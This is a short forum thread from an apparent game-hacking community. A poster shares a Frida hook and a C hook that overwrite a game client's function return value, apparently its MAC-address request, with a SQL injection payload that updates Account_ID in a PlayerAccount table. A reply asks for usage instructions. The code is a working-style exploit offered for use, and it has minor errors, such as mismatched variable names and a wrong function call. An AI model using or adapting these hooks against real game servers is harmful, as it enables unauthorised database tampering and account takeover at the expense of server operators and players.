regarding SQL injection

the1Domo · Sep 27, 2020

Code:

0x6031C0

Interceptor.attach(ptr("0x6031C0"), {
 onLeave: function(retval){
  var request = "?');update PlayerAccount set Account_ID='ACCOUNT_ID_NEW' where Account_ID='ACCOUNT_ID';--";
  retval.replace(Memory.allocUtf8String(request));
 }
})





RF_O_UP_FUNC_CONTEXT(getMac_hook, 0x6031C0, 0x0); //eax as this
char* read_request(){
 FILE *f = fopen("C:\\request.txt", "r");
 fseek(f, 0, SEEK_END);
 long fsize = ftell(F);
 fseek(f, 0, SEEK_SET);

 char *string = (char*)malloc(fsize + 1);
 fread(string, fsize, 1, f);
 fclose(F);

 string[fsize] = 0;
 return string;
}

void getMac_hook(Context *context){
 int *ptr = (int*)(void*)(context->ESP);
 ptr[5] = (int)(int*)read_request();
}



getMac_hook("update PlayerAccount set Account_ID='ACCOUNT_ID_NEW' where Account_ID='ACCOUNT_ID';--");

Lifefire · Sep 30, 2020

Domo, while i can tell what this does and so can a few others, a lot of others may not be able to. You should let them know what to do with it.

regarding SQL injection

the1Domo

Founder of EvilSource

Lifefire

Junior Spellweaver

About Us

Online statistics

Forum statistics

RaGEZONE Sponsor